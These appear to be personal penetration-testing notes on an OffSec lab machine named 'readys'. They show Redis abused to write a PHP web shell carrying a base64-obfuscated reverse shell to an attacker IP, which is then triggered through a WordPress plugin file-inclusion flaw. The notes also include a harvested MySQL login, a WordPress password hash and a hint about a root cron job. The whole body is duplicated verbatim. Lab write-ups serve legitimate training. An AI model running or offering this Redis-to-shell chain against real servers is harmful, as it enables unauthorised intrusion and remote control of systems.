redis

redis-cli -a $pass -h $host

configuration location

/etc/redis/redis.conf

/etc/systemd/system/redis.service to locate where you can write files

reverse shell

192.168.191.166:6379> flushall
OK
192.168.191.166:6379> config get dir
1) "dir"
2) "/opt/redis-files"
192.168.191.166:6379> config set dbfilename test.php
OK
192.168.191.166:6379> set test "<?php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4xOTEvODAgMD4mMQ== | base64 -d | bash'); ?>"
OK
192.168.191.166:6379> save
OK

then trigger the test.php file you created. If you have LFI you can do so with something like below

http://readys.offsec/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php

Enumerated wp-config.php file to get the MySQL login. (karl / Wordpress1234)

Enumerated users in the db and nothing interesting there.

alice@readys:/var/www$ mysql -u karl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 106
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 | admin         | test@test.com | http://localhost | 2021-07-11 16:35:27 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

MariaDB [wordpress]> quit
Bye

Running LSE only shows us one interesting item which is a cron running as root every 3 minutes.

Previouspowerview Nextwpscan

Last updated 3 years ago

reverse shell

192.168.191.166:6379> flushall
OK
192.168.191.166:6379> config get dir
1) "dir"
2) "/opt/redis-files"
192.168.191.166:6379> config set dbfilename test.php
OK
192.168.191.166:6379> set test "<?php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4xOTEvODAgMD4mMQ== | base64 -d | bash'); ?>"
OK
192.168.191.166:6379> save
OK

then trigger the test.php file you created. If you have LFI you can do so with something like below

http://readys.offsec/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php

Enumerated wp-config.php file to get the MySQL login. (karl / Wordpress1234)

Enumerated users in the db and nothing interesting there.

alice@readys:/var/www$ mysql -u karl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 106
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 | admin         | test@test.com | http://localhost | 2021-07-11 16:35:27 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

MariaDB [wordpress]> quit
Bye

Running LSE only shows us one interesting item which is a cron running as root every 3 minutes.